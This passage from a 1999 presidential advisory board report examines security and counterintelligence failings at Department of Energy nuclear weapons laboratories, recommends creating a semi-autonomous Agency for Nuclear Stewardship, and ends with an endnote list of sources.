PROSPECTS FOR REFORMS
Although we applaud Secretary Richardson’s initiative, we seriously doubt that his initiatives will achieve lasting success. Though certainly significant steps in the right
direction, Secretary Richardson’s initiatives have not yet solved the many problems. Significant objectives, all of which were identified in the DOE OCI study
completed nearly a year ago, have not yet been fully achieved. Among these unmet objectives are revising the DOE policy on foreign visits and establishing an
effective polygraph examination program for selected, high-risk programs. Moreover, the Richardson initiatives simply do not go far enough.
These moves have not yet accomplished some of the smallest fixes—despite huge levels of attention and Secretarial priority. Consider the following example: with all
the emphasis of late on computer security, including a weeks-long stand-down of the weapons labs computer systems directed by the Secretary, the stark fact
remains that, as of the date of this report, a nefarious employee can still download secret nuclear weapons information to a tape, put it in his or her pocket, and walk
out the door. Money cannot really be the issue. The annual DOE budget is already $18 billion. There must be some other reason.
Under the Richardson plan, even if the new “Security Czar” is given complete authority over the more than $800 million ostensibly allocated each year to security of
nuclear weapons-related functions in DOE, he will still have to cross borders into other people’s fiefdoms, causing certain turmoil and infighting. If he gets no direct
budget authority, he will be left with little more than policy guidance. Even then, as the head of a staff office, under the most recent Secretary Richardson
reorganization he has to get the approval of yet another fiefdom, the newly created Field Management Council, before he can issue policy guidance. Moreover, he is
unlikely to have much success in obtaining approval from that body when he is not even a member—and the majority of those who are members are the very
program managers that his policy guidance would affect.
TROUBLE AHEAD
Perhaps the most troubling aspect of the PFIAB’s inquiry is the evidence that the lab bureaucracies—after months at the epicenter of an espionage scandal with
serious implications for U.S. foreign policy—are still resisting reforms. Equally disconcerting, other agencies have joined the security skeptics list. In the past few
weeks, officials from DOE and other agencies have reported to us:
There is a heightened attention to security at the most senior levels of DOE and the labs, but at the mid-level tiers of management there has been
lackluster response and “business as usual.”
Unclassified but sensitive computer networks at several weapons labs are still riddled with vulnerabilities.
Buildings that do not meet DOE security standards are still being used for open storage of weapons parts.
Foreign nationals—some from sensitive countries—residing outside a weapons lab have remote dial-up access to unclassified networks without any
monitoring by the lab.
In an area of a weapons lab frequented by foreign nationals, a safe containing restricted data was found unsecured. It had not been checked by guards
since August 1998. When confronted with the violation, a mid-level official is said to have implied that it was not an actual security lapse because the
lock had to be “jiggled” to open the safe door.
A weapons lab was instructed to monitor its outgoing email for possible security lapses. The lab took the minimal action necessary; it began monitoring
emails but did not monitor the files attached to emails.
When Secretary Richardson ordered the recent computer stand-down, there was great resistance, and when it came time to decide if the labs’
computers could be turned on again, a bevy of DOE officials fought to have final approval power.
BACK TO THE FUTURE
In 1976, federal officials conducted a study of the nation’s nuclear weapons laboratories and plants. In trying to devise a coherent and viable way of managing the
labs, they settled on three possible solutions: place the weapons labs under the Department of Defense, make them a free-standing agency, or leave them within the
Energy Research and Development Administration. Congress chose to leave the weapons labs within ERDA, the successor agency of the Atomic Energy
Commission.
Nearly a decade later, the oversight of the weapons labs was still of great concern. Senators Sam Nunn and John Warner led a push to place the weapons labs
under the auspices of the Department of Defense. However, the Reagan Administration staved off their effort by agreeing to put together a blue-ribbon panel to
study the issue. The panel studied the problem for six months and issued a report in July, 1985. Again, Congress and federal officials weighed whether the weapons
labs should be transferred to the Department of Defense or restructured to be given more autonomy.
The status quo prevailed. The weapons labs stayed within the Department of Energy.
As this report has detailed, problems in the managerial relationship between DOE and the weapons labs have persisted, perhaps even increased, over the past 14
years. Indeed, the discussion today sounds hauntingly familiar to the discussions in the 1980s and 1970s.
Today, however, there is a difference. The record of mismanagement of the weapons labs in matters of security and counterintelligence has become so long and so
compelling as to demand a rejection of the status quo. There can be no doubt that the current structure of the Department of Energy has failed to give the nation’s
weapons laboratories the level of care and attention they warrant. Thus, our panel is recommending deep and lasting structural change that will give the weapons
laboratories the accountability, clear lines of authority, and priority they deserve.
REORGANIZATION
What makes a government agency run well? There are a multitude of characteristics that arguably can make for an efficient and effective government agency or
department. This Panel holds no illusions about the completeness of its understanding nor the purity of its wisdom regarding government bureaucracies. Indeed, some
people would say that truly comprehending the inner workings of a federal department is the intellectual equivalent of grasping the enormity of the universe. Over the
course of many years, however, we, as members of the President’s Foreign Intelligence Advisory Board, have evaluated the performance of numerous federal
entities, from the Department of Defense to the Foreign Broadcast Information Service. Some, we found, were in good order, others in pretty bad shape. In that
sense, we believe we do know a lot about what makes some agencies work and not work. Although somewhat subjective and by no means exhaustive, our list of
“good” things to look for includes several attributes.
LEADERSHIP
Certainly at the top, but also throughout the organization. The leaders and managers set the standards and expectations regarding performance and accountability.
They are the foundation upon which a successful organizational culture is built. If management sets, demonstrates and enforces high standards for performance and
accountability, there is a strong likelihood that the organization will follow. And, longevity is a key ingredient. For example, Daniel S. Goldin, Administrator of the
National Aeronautics and Space Administration (NASA), was named to his post in the spring of 1992. Goldin has won considerable acclaim for demanding nothing
but the best from his employees, and thereby turning around a bureaucracy that had become ossified and recalcitrant to higher authority, including the President. He
did not do it overnight, though. His “watch” is now seven years long and still going. By contrast, the average stay for an Energy Secretary has been about two and a
half years; a Deputy Secretary, less than two years; and an Under Secretary, less than 18 months.[1]
CLARITY OF MISSION
Employees must know who they are and why they are there. Mission statements may seem corny to some, but from our experience good ones work. NASA’s is
crisp, clear and bold: “NASA is an investment in America’s future. As explorers, pioneers and innovators, we boldly expand frontiers in air and space to inspire and
serve America, and to benefit the quality of life on Earth.” The Energy Department also declares itself a department of the future; its slogan is “Science, Security and
Energy: Powering the 21st Century.” However, we wonder if the DOE employees in the field really have a sense of purpose and direction. Those at the Oakland
Operations Office are challenged to, “serve the public by executing programs and performing DOE contract management.” At Albuquerque Operations Office, the
rallying cry is, “to contribute to the welfare of the nation by providing field-level federal management to assure effective, efficient, safe and secure accomplishment of
the Department’s national defense, environmental quality, science and technology, technology transfer and commercialization and national energy objectives.”[2]
DEDICATION TO EXCELLENCE
It is the responsibility of leadership to emphasize continuously and top-to-bottom the absolute importance of quality of performance. People truly dedicated to
excellence usually achieve it.
EMPHASIS ON CORE COMPETENCIES
Those agencies that constantly emphasize the business areas in which they must absolutely excel, usually do so. At NASA, we are told, rarely, if ever, does the
Administrator give a speech in which safety is not emphasized. DOE has appropriately emphasized excellence in the quality of its scientific and technical work, but
only recently has begun to emphasize security, and only in recent months has articulated the importance of counterintelligence. The panel was hard pressed to find
either word mentioned in speeches by most of Secretary Richardson’s predecessors.
MINIMAL POLITICAL PRESSURES
Blessed is the government manager whose operations fall into only a handful of Congressional districts and under the purview of only a couple of oversight
committees. It doesn't take a nuclear scientist to understand that the more Congressional districts and committees with which a federal agency must contend, the
more it is politically whip-sawed in its priorities and stuffed with pork. We suspect the Department of Energy probably holds some federal records: its multitudinous
and widely cast operations come under the scrutiny of no less than 18 Congressional committees and fund well-paying federal and contractor jobs in more than 50
congressional districts.
STREAMLINED FIELD OPERATIONS
In just about any endeavor, but especially in managing government contracts, simpler is better. Managing government contracts has become a major function in more
and more agencies and departments as they seek to cut costs. We know of a few good examples of agencies where this effort is both efficient and effective.
One is the National Reconnaissance Office (NRO), a semi-autonomous Defense Department agency, which has long managed huge contracts with major industrial
firms that have built and help operate our nation's surveillance satellites. The NRO, however, came under heavy fire several years ago for budget irregularities, partly
as a result of tangled lines of bureaucratic authority. Today, after some substantial streamlining, multi-million dollar contracts are run out of program management
offices at NRO Headquarters on a line of accountability leading directly to the contracting company. Rather than maintaining large field offices, the NRO employs
only a handful of representatives in the field—typically only one or two people resident at their largest contractors. The rest is done from Washington. To manage
their largest contracts, no more than 15 contracting officers—from worker-level to management—are involved. Some are worth several billion dollars. Currently,
the NRO manages over 1,000 contracts worldwide, with a combined value numbering in the tens of billions of dollars. They manage these contracts using a staff of
approximately 250 contract officers.[3]
Though we acknowledge that there are differences between the missions of NRO’s satellite contractors and DOE’s nuclear weapons lab contractors, we are
stunned by the huge numbers of DOE employees involved in overseeing a weapons lab contract. For example, Sandia National Weapons Laboratory, a
contractor–operated facility in New Mexico, has several layers of Energy Department employees with whom it must deal: the Kirtland (Air Force Base) Area Office,
with about 55 “feds,” which is subordinate to the Albuquerque Field Office (AFO), which has a total complement of about 1,300 government workers. Albuquerque
also monitors contracts with Los Alamos National Lab (through a Los Alamos Area Office of some 70 people), and several other contractors throughout the
southern United States. Notably, Albuquerque is but one of 11 such DOE Field Offices, which boast a total field complement of about 6,000. Back at DOE
Headquarters, which has a total work force of close to 5,000, Sandia’s contracts are monitored, depending on the subject, by several Program Offices—including
Defense Programs (somewhat over 100 officials) and Environmental Management (somewhat over 200 officials).
We repeatedly heard from officials at various levels of DOE and the weapons labs how this convoluted and bloated management structure has constantly transmitted
confusing and often contradictory mandates to the labs. This is vividly illustrated by the labyrinthine organizational charts that one must decipher to trace lines of
authority.
RESPONSIBILITY AND ACCOUNTABILITY IN SECURITY
One senior CIA official told us that the NRO security system is the best in the government—a view echoed, we understand, in a forthcoming report by the
DCI/Defense Secretary Joint Security Commission. One can see why. At the NRO, security starts at the top. The chief of security provides policy guidance and
monitors implementation. However, from the Director on down, all line managers are responsible for implementation. If a security breach occurs, the Director and
appropriate line subordinates all are accountable. Similarly, NRO contractors are expected to meet fully NRO security standards and guidelines. Failure to meet
those guidelines could well result in forfeiture of performance award fees, at the least.
FULL OPERATIONAL INTEGRATION
To be effective, security must be more than a concept; it must be woven into every aspect of the agency’s business and the daily work of every employee. The NRO
integrates security more fully than most other federal agencies we have seen. Though it has separate line items for security and counterintelligence functions, most
security–related expenditures are integrated directly into the line items of every satellite program. Thus, rather than imposing security mandates as contract
“add-ons,” security officials work with the NRO managers to fold their requirements into a given program during the planning stages. In this structure, security
requirements are as much a part of an NRO satellite program as are solar cells and thrusters. And the NRO security professionals, rather than being treated as staff
functionaries, are accepted as true partners in the NRO mission.
A PREVAILING CONSCIOUSNESS
Making people aware is vital. The record clearly shows that DOE has had mixed results from its various security and counterintelligence indoctrination programs.
Briefings, town hall meetings and educational films are helpful, but they cannot take the place of a working environment in which security is just part of the daily
routine. Again at the NRO, when a management decision is made, security always gets a voice. A security official is present at every level of NRO decision making:
from the Office Director, to his Board of Directors, to the management teams of the smallest NRO program, security officials are part of the management process.
Moreover, “security” gets a vote equal to that of any program manager. From the record, we judge that security at DOE, until recently, only occasionally had a
voice; and when it did, many managers vociferously objected. Counterintelligence, on the other hand, was allowed little more than a whisper.
RESTRUCTURING
The panel is convinced that real and lasting security and counterintelligence reform at the weapons labs is simply unworkable within DOE’s current structure and
culture. To achieve the kind of protection that these sensitive labs must have, they and their functions must have their own autonomous operational structure free of all
the other obligations imposed by DOE management. We strongly believe that this cleaving can best be achieved by constituting a new government agency
that is far more mission–focused and bureaucratically streamlined than its antecedent, and devoted principally to nuclear weapons and national
security matters.
The agency can be constructed in one of two ways. It could remain an element of DOE but become semi-autonomous—by that we mean strictly segregated from
the rest of the department. This would be accomplished by having the agency director report only to the Secretary of Energy. The agency directorship also could be
“dual-hatted” as an Under Secretary, thereby investing it with extra bureaucratic clout both inside and outside the department.
We believe there are several good models for this course of action: the National Security Agency and the Defense Advanced Research Projects Agency, both
elements of the Defense Department; and the National Oceanographic and Atmospheric Administration, an agency of the Commerce Department. Alternatively, the
agency could be completely independent, with its administrator reporting directly to the President. The National Aeronautics and Space Administration and the
National Science Foundation are also good models.
Regardless of the mold in which this agency is cast, it must have staffing and support functions that are autonomous from the remaining operations at DOE. These
functions, which report directly to the Director, must include: an inspector general; a general counsel; a human resources staff; a comptroller; a senior official
responsible solely for security policy, and another responsible solely for counterintelligence policy. To protect its autonomy and avoid the diversion of funds to other
purposes, the agency budget must be a separate line item strictly segregated by Congress from other budget pressures—even if it remains nominally within the
current DOE structure. The agency also must have a separate employee career service. The panel recommends an “excepted service” model of employment, like
many of the intelligence community elements, which would facilitate accountability and higher performance levels by allowing management to reward, punish, hire,
and fire employees more easily.
To ensure its long–term success, this new agency must be established by statute. That statute, moreover, must clearly stipulate that nothing less than an act of
Congress can amend the agency’s mission, functions or affiliations. Clearly, Congress and the President must decide definitively which of these two solutions to
enact. The panel has no specific preference between them; we believe either can be made effective. Should Congress and the President conclude that retaining the
agency inside DOE is not workable, the “wholly-independent” approach should be enacted.
We emphasize that it is very important for the new structure to be organized to preserve and, if possible, enhance the ability of the national weapons labs to attract
and retain scientists of the highest caliber. Excellence in the caliber of the scientists and their research and development programs must be sustained if the weapons
labs are to fulfill their missions in the front line of U.S. national security. To meet this goal, continued but carefully controlled interaction with foreign visitors and
scientists from around the world as well as with researchers from DOE’s nondefense labs is essential for producing the best science. In the semi-autonomous model,
the Secretary would be responsible for managing and ensuring the effectiveness of agency relations with the nonweapons labs.
Whichever solution Congress enacts, we do feel strongly that the new agency never should be subordinated to the Defense Department. Defense already is
populated with a number of semi–autonomous agencies; we see no reason to add to that burden. Moreover, we believe the decision made long ago to house
America’s nuclear weapons research and development in a civilian government agency still makes sense. Specifically, we recommend that the Congress pass
and the President sign legislation that:
Creates a new, semi–autonomous Agency for Nuclear Stewardship (ANS), whose Director will report directly to the Secretary of Energy.
The Director should be dual–hatted as an Under Secretary of Energy. This new agency will oversee all nuclear weapons–related matters previously
housed in DOE, including Defense Programs and Nuclear Nonproliferation; it also will oversee all functions of the National Weapons labs. (If Congress
opts to create a totally independent agency, the Director should report directly to the President.)
Streamlines the ANS/Weapons Lab management structure by abolishing ties between the weapons labs and all DOE regional, field and
site offices, and all contractor intermediaries. The so–called “GOCO,” or “government owned, contractor operated,” concept of lab management
should be retained. GOCO has been very successful, particularly in providing employment conditions that attract scientists of the highest caliber, and
the federal government is strongly committed to maintaining that working relationship. Even if DOE opts to retain these field entities for other purposes,
the ANS should sever all association with them. All ANS/Weapons Lab communications and business should be handled by ANS Liaison Offices
established in each lab and manned with a small staff. (Our short review time did not permit us to explore fully this issue. We doubt that any amount of
time would be sufficient. Suffice it to say that we did learn enough about the costs and benefits of these myriad DOE field bureaucracies to persuade us
to recommend cutting all ties between them and the new agency.)
Mandates that the Director/ANS be appointed by the President with the consent of the Senate and, ideally, have an extensive background in
national security, organizational management, and appropriate technical fields. Admittedly, finding an individual with solid credentials in all three areas
may prove an elusive goal. However, meeting two out of those three criteria should be considered mandatory, provided that one of the criteria always
met is management experience. The Deputy Director should have a background in an area that compensates for areas in which the Director lacks
experience. The Director should serve for a minimum fixed term of 5 years, not coincident with quadrennial transitions of administrations, and be
subject to removal only by Presidential direction.
Stems the historical “revolving door” and management expertise problems at DOE by severely circumscribing the number of political
appointees assigned to ANS and requiring all ANS senior political appointees to have strong backgrounds in both national security (intelligence,
defense, or foreign policy) and management (corporate, government, or military).
Ensures effective administration of safeguards, security, and counterintelligence at all the weapons labs and plants by creating a
coherent security/CI structure within the new agency. We strongly recommend following the NRO’s model of security management. The senior
CI official at ANS—we recommend a Special Assistant to the Director for CI policy—should be mandated as a permanent FBI senior executive
service position.
Abolishes the Office of Energy Intelligence. A Special Assistant to the ANS Director for Intelligence Liaison should be created within the new
agency, with a staff of no more than 20. The Special Assistant should be responsible for managing relations with the intelligence community, briefing
ANS senior management on intelligence matters, and ensuring ANS intelligence requirements are met. This office should follow the Treasury
Department model. (The Secretary of Energy would not be precluded from establishing a similar special assistant to address the department’s
non-weapons–related intelligence coordination and briefing needs.)
Shifts the balance of analytic billets from the former Office of Energy Intelligence (about 40) to the DCI’s Nonproliferation Center to bolster intelligence
community technical expertise on nuclear matters. These billets should be permanently funded by ANS, but permanently assigned to the DCI Center.
Weapons lab employees and ANS civil servants should be temporarily assigned to these positions for two year tours.
A Semi-Autonomous or Wholly Independent Nuclear Weapons Stewardship Agency should have the following attributes:
The agency would be entirely separated from DOE, except in the semi-autonomous case, where the agency director—as a DOE Under Secretary—would report
directly to the Secretary.
The agency would have no bureaucratic ties to DOE other than R&D contracting, which would be managed by the agency Deputy Director. The weapons
labs would be encouraged nonetheless to foster strong scientific interactions with the other DOE research labs. In the case of a wholly independent agency, the
Director would be the chief executive officer.
In the case of a semi-autonomous agency, the Director would be dual-hatted as a DOE Under Secretary.
An independent oversight board would monitor performance and compliance with agency policies and guidelines, up and down the organizational structure.
Authority from the agency Director to the weapons labs would run directly through the Deputy Director, who also would be dual-hatted as the Defense Programs
Manager and, therefore, a manager of lab work.
The security chief, directly reporting to the agency Director, would promulgate all security policies and guidelines for the agency and the weapons labs, including
safeguards and cyber-security.
The counterintelligence chief, also directly attached to the agency Director, would promulgate all counterintelligence policies and guidelines for the agency and the
weapons labs. He/she also would manage the foreign visitors and assignments program.
As Defense Programs Manager for the weapons labs, the agency Deputy Director would be responsible for ensuring the integration of all security and
counterintelligence policies and guidelines into all weapons lab programs.
Security officers and counterintelligence officers would be attached to all line offices, with heavy representation in Defense Programs, where full integration would
occur. They also would be attached to all labs, in multiple numbers.
Security and counterintelligence officers would report to their appropriate line managers on a day-to-day basis, but also report respectively to the agency security
and counterintelligence chiefs on policy implementation issues. All policy implementation disputes would be referred back to the agency director for resolution.
ADDITIONAL RECOMMENDATIONS
There are a number of initiatives that must be undertaken immediately to start building a new agency culture and identity and restoring public confidence:
Establish a clear mission and clear standards of excellence. The agency’s mission, and that of each subordinate unit, must be clearly articulated. Strong
security and counterintelligence in addition to scientific achievement must be core elements of the mission. Similarly, clear standards of excellence must
be established throughout the organization. Excellence must be the goal of scientists, engineers, technicians, and managers as well as security and
counterintelligence officials.
Establish a clear chain of accountability. There must be clear, simple, indelible lines of accountability from top to bottom. If a failure occurs, there must
be a straightforward means for determining accountability—at all levels. Seeking consensus and advice is important, but ultimately a decision must be
made by individuals, and those individuals should be held accountable.
Hold leaders accountable. Accountability must be enforced, particularly among the agency managers who will form the backbone of the new agency
and instill a new culture of excellence.
Reward achievement. Criteria should be clear and rewards substantial. Protection of nuclear secrets and expansion of scientific knowledge should be
among the most valued. Achievement must be judged on contribution to mission, not to program expansions or budget increases.
Punish failure ... with severity, if necessary. Penalties should be tough, but fair and proportional. Laxity in protecting nuclear secrets and other sensitive
information should be among the most severely punished.
Train and educate. Establish a formal educational and training system to develop a professional cadre of career managers and leaders. Security and
counterintelligence should be major parts of the core curriculum passed down to all lab personnel in regular briefings and training sessions.
Do not forget the primary mission. Preserve and strengthen those agency attributes—including cutting edge research in the most advanced scientific
fields—that will attract the finest talent in the nation. With respect to the weapons laboratories, continue to foster their unparalleled lead in intellectual
excellence. But never lose sight that protecting the nation by securing its nuclear stockpile and nuclear secrets—through good science and good
management—is Job Number One.
While maintaining its autonomy, the agency should nonetheless emphasize continued close scientific interaction with the DOE research labs not engaged
in weapons–related endeavors. In the semi–autonomous alternative, DOE should also be responsible for ensuring that good relations are maintained
between the non-weapons labs and the weapons labs.
SECURITY AND COUNTERINTELLIGENCE ACCOUNTABILITY
Accountability. The agency director should issue clear security accountability guidelines. The agency security chief must be accountable to the agency
director for security policy at the labs, and the lab directors must be accountable to the agency director for compliance. The same system and process
should be established to instill accountability among counterintelligence officials.
Independent Oversight. Attentive, independent oversight will be critical to ensuring high standards of security and counterintelligence performance at the
new agency. In that regard, we welcome Senator John Warner’s recent legislative initiative to create a small, dedicated panel to oversee security and
counterintelligence performance at the weapons labs. This oversight should include an annual certification process.
Joint Committee for Congressional Oversight of ANS/Labs. Congress should abolish its current oversight system for the national weapons labs. Just as
the profligate morass of DOE contractors and bureaucrats has frustrated the critical national interest of safeguarding our nuclear stockpile, so has the
current scheme of Congressional oversight with roughly 15 competing committees laying claim to some piece of the nuclear weapons mission.
ANS Inspector General. The President, Congress, and the director of the new agency should cooperatively, through executive order, legislation, and
agency directive, provide teeth to the authority of the new agency’s inspector general. For example, the inspector general, the independent oversight
body, and the agency director should all have to concur on the findings of the annual report to the President on safeguards and security at the weapons
labs.
EXTERNAL RELATIONS
The CIA and FBI should expand their “National Security Partnership” to include the new agency and the weapons labs. Reciprocal assignment
programs should be implemented to promote cross-fertilization of expertise and experience.
CIA and DIA should bolster their support for ANS needs. Both intelligence agencies should establish analytic accounts to support the specific
substantive and counterintelligence interests and needs of the new ANS and the weapons labs. These accounts, among other issues, should regularly
produce data on the nuclear–related collection efforts of all foreign governments and foreign intelligence services. This data should serve as the
foundation for regularized weapons lab counterintelligence briefs for the foreign visits/foreign visitors programs.
Improve national security and law enforcement cooperation, particularly with respect to counterintelligence case referrals and handling. The National
Security Council should take the lead in establishing clear Executive Branch guidelines and procedures for resolving disputes between agencies over law
enforcement and national security concerns. A government–wide process needs to be established by which competing interests can be adjudicated by
officials who are properly informed of all relevant facts and circumstances, but who also are sufficiently senior to make decisions stick.
Ensure a government–wide review of legal tools to address the current foreign intelligence threat. The National Security Council should conduct a
review to ensure that sufficient legal authority and techniques are available and appropriate in light of the evolution of a very sophisticated threat and the
ongoing revolution in information systems.
PERSONNEL SECURITY
An effective personnel security program. The agency director should immediately undertake a total revamping of the “Q” clearance program and look
to the security elements in the intelligence community for advice and support. This review should result in a complete rewrite of existing guidance and
standards for the issuing, revoking and suspending of security clearances. Special attention should be paid to establishing a clear—and relatively
low—threshold for suspending clearances for cause, including pending criminal investigations. The review also should significantly strengthen the
background investigation process by restructuring contracts to create incentives for thoroughness. We strongly advocate abolishing the prevalent
method of paying investigators “by the case.” Strict “need–to–have” regulations should be issued for regular reviews of all contract employees’
clearance requirements. Those without a continuing need should have their clearances withdrawn. The National Security Council should review and
resolve issues on a government–wide basis that permit a person who is under FBI investigation for suspected espionage to obtain a new or renewed
clearance; existing standards for clearance renewal also should be reviewed with an eye toward tightening up.
A professional administrative inquiry process. Promulgate new agency guidelines and standards for security–related administrative inquiries to ensure
that proper security/counterintelligence procedures and methods are employed. Very high professional qualification standards should be established and
strictly maintained for all security personnel involved in administrative inquiries.
PHYSICAL/TECHNICAL/CYBERSECURITY
Comprehensive weapons lab cyber–security program. Under the sponsorship and specific guidance of the agency Director, the weapons labs should
institute a broad and detailed program to protect all computer workstations, networks, links and related systems from all forms of potential
compromise. This program, which should be reviewed by and coordinated with appropriate offices within the U.S. intelligence community, must include
standard network monitoring tools and uniform configuration management practices. All lab computers and networks must be constantly monitored and
inspected for possible compromise, preferably by an agency–sponsored, independent auditing body. A “best practices” review should be conducted
yearly by the appropriate agency security authority.
Comprehensive classified document control system. Document controls for the most sensitive data of the weapons labs should be reinstituted by the
agency Director. The program should be constantly monitored by a centralized agency authority to ensure compliance.
A comprehensive classification review. The new agency, in coordination with the intelligence community, should promulgate new, concise, and precise
classification guidance to define and ensure awareness of information and technologies that require protection. This guidance should clear up the
widespread confusion over what is export–controlled information; what information, when joined with other data, becomes classified; and the
differences between similarly named and seemingly boundless categories such as “unclassified controlled nuclear information” and “sensitive but
unclassified nuclear information.”
BUSINESS ISSUES
Make security an integral part of doing business. Security compliance must be a major requirement in every agency contract with the weapons labs.
Rather than a detailed list of tasks, the contract should make clear the security and counterintelligence standards by which the lab will be held
accountable. It is the responsibility of the lab to develop the means to achieve those objectives. If a lab fails to conform to these standards and
requirements, the agency should withhold performance award fees.
Review the process for lab management contracts. If the agency director has reason to open the bidding for lab management contracts, we strongly
recommend an intensive market research effort. Such an effort would help ensure that legitimate and competent bidders, with strong records for
productive research and development, participate in the competition.
Weapons labs foreign visitors program. This productive program should continue, but both the agency and the weapons labs, in concert, must ensure
that secrets are protected. This means precise policy standards promulgated by the agency to ensure: the integrity of the secure areas and control over
all foreign visitors and assignees; a clear demarcation between secure and open areas at the labs; strong enforcement of restrictions against sensitive
foreign visitors and assignees having access to secure facilities; and sensible but firm guidelines for weapons lab employees’ contacts with foreign
visitors from sensitive countries. Exceptions should be made by the agency director on a case–by–case basis. Clear, detailed standards should be
enforced to determine whether foreign visits and appointments receive approval. The burden of proof should be placed on the employees who propose
to host visitors from sensitive countries. Visits should be monitored by the labs and audited by an independent office. The bottom line: treat foreign
visitors and assignees with the utmost courtesy, but assume they may well be collecting information for other governments.
Foreign travel notification. The agency should institute a program whereby all agency and weapons lab employees in designated sensitive positions must
make written notification of official and personal foreign travel well before departure. The agency must keep close records of these notifications and
also ensure that effective counterintelligence briefings are provided to all such travelers. Unless formally granted an exception, scientists for weapons
labs should travel in pairs on official visits to sensitive countries.
Counterintelligence. The FBI should explore the possibility of expanding foreign counterintelligence resources in its field offices near the weapons
labs. The panel offers additional thoughts for improving the Department’s CI efforts in the Classified Appendix to this report.
ENDNOTES
CHAPTER: ROOT CAUSES
1 The Department of Energy National Weapons Labs and Plants discussed in this report are: Lawrence Livermore National Lab, California; Los Alamos National
Lab, New Mexico; Sandia National Lab, New Mexico; PANTEX Plant, Texas; Kansas City Plant, Missouri; Oak Ridge (Y-12) Plant, Tennessee.
2 Boyer, Paul. By the Bomb’s Early Light: American Thought and Culture at the Dawn of the Atomic Age. Chapel Hill: University of North Carolina Press, 1985, p.
138.
3 National Science Foundation, “Science and Engineering Indicators,” 1996.
4 National Science Foundation, “Data Brief,” Vol. 1996, No. 9, August 19, 1999.
5 Classified report.
6 Classified DOE Report.
7 DOE, “Annual Report to Congress, 1978,” April 1979.
8 U.S. Nuclear Command and Control System Support Staff, “Assessment Report: Department of Energy Nuclear Weapons-Related Security Oversight Process,”
March 1998.
CHAPTER: RECURRING VULNERABILITIES
1 U.S. Nuclear Command and Control System Support Staff, “Assessment Report: Department of Energy Nuclear Weapons-Related Security Oversight Process,”
March 1998.
2 Classified DOE Report.
3 Classified DOE Report.
4 Classified DOE Report.
5 Classified DOE Report.
6 DOE, Office of Counterintelligence, “The Foreign Intelligence Threat to Department of Energy Personnel, Facilities and Research, Summary Report,” August
1990.
7 Classified U.S. Government report.
8 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997.
9 Hewlett, Richard G. and Francis Duncan, “Atomic Shield: A History of the U.S. Atomic Energy Commission,” May 1969.
10 Classified DOE report.
11 DOE, “Office of Safeguards and Security, Report to the Secretary: Status of Safeguards and Security,” February 1993.
12 Classified FBI document.
13 Classified U.S. Government report.
14 Classified DOE report.
15 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1993,” January 1994 (U).
16 DOE/IG-385, “Special Audit Report on the Department of Energy’s Arms and Military-Type Equipment,” February 1, 1996.
17 Classified DOE report.
18 DOE, “Annual Report to the President on the Status of Safeguards and Security at Domestic Nuclear Weapons Facilities,” September 1996.
19 GAO/RCED-91-12, “Nuclear Safety: Potential Security Weaknesses at Los Alamos and Other DOE Facilities,” October 1990 (U) and GAO/RCED-92-39,
“Nuclear Security: Safeguards and Security Weaknesses at DOE’s Weapons Facilities,” December 13, 1991.
20 GAO/RCED-90-122, “Nuclear Security: DOE Oversight of Livermore’s Property Management System is Inadequate,” April 18, 1990.
21 GAO/”Key Factors Underlying Security Problems at DOE Facilities,” (Statement of Victor S. Rezendes, Director, Energy, Resources and Science Issues,
Resources, Community, and Economic Development Division, GAO, in testimony before the Subcommittee on Oversight and Investigations, Committee on
Commerce, House of Representatives), April 20, 1999.
22 GAO/”Key Factors Underlying Security Problems at DOE Facilities,” (Statement of Victor S. Rezendes, Director, Energy, Resources and Science Issues,
Resources, Community, and Economic Development Division, GAO, in testimony before the Subcommittee on Oversight and Investigations, Committee on
Commerce, House of Representatives), April 20, 1999.
23 Classified DOE report.
24 Hewlett, Richard G. and Francis Duncan, “Atomic Shield, A History of the United States Atomic Energy Commission,” May 1969.
25 GAO/RCED-89-34, “Nuclear Security: DOE Actions to Improve the Personnel Clearance Program,” November 9, 1988.
26 DOE/IG/WR-O-90-02, “Nevada Operations Office Oversight of Management and Operating Contractor Security Clearances,” March 1990.
27 Classified DOE report.
28 DOE/IG/WR-B-91-08, “Review of Contractor’s Personnel Security Clearances at DOE Field Office, Albuquerque,” September 1991.
29 DOE, “Office of Safeguards and Security, Report to the Secretary: Status of Safeguards and Security,” February 1993.
30 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1995,” January 1996.
31 Classified U.S. Government report.
32 Classified DOE report.
33 GAO/RCED-92-39, “Nuclear Security: Safeguards and Security Weaknesses at DOE Weapons Facilities,” December 13, 1991.
34 Classified DOE report.
35 Classified DOE report.
36 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1993,” January 1994 (U).
37 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1994,” January 1995 (U).
38 Classified DOE report.
39 Classified DOE report.
40 Classified DOE report.
41 Classified DOE report.
42 Classified DOE report.
43 New York Times, “Abstract,” August 5, 1977.
44 DOE, “Plutonium: The First 50 Years. United States Plutonium Production, Acquisition, and Utilization from 1944 Through 1994.”
45 GAO/RCED-92-39, “Nuclear Security: Safeguards and Security Weaknesses at DOE’s Weapons Facilities,” December 13, 1991.
46 GAO/RCED/AIMD-95-5, “Nuclear Nonproliferation: U.S. International Nuclear Materials Tracking Capabilities are Limited,” December 27, 1994.
47 GAO/AIMD-95-165, “Department of Energy: Poor Management of Nuclear Materials Tracking Capabilities Are Limited,” August 3, 1995.
48 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1995,” January 1996.
49 U.S. Nuclear Command and Control System Support Staff, “Assessment Report: Department of Energy Nuclear Weapons-Related Security Oversight
Process,” March 1998.
50 GAO/RCED-89-31, “Major Weaknesses in Foreign Visitor Controls at Weapons Laboratories,” October 11, 1988.
51 Classified U.S. Government report.
52 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997.
53 Classified DOE report.
54 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997.
55 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997.
56 DOE, “Response to the Cox Committee Report: The Benefits of Department of Energy International Scientific and Technical Exchange Programs,” April 1999.
57 GAO/RCED-99-19, “Department of Energy: Problems in DOE’s Foreign Visitors Program Persist,” October 6, 1998.
CHAPTER: ASSESSMENTS
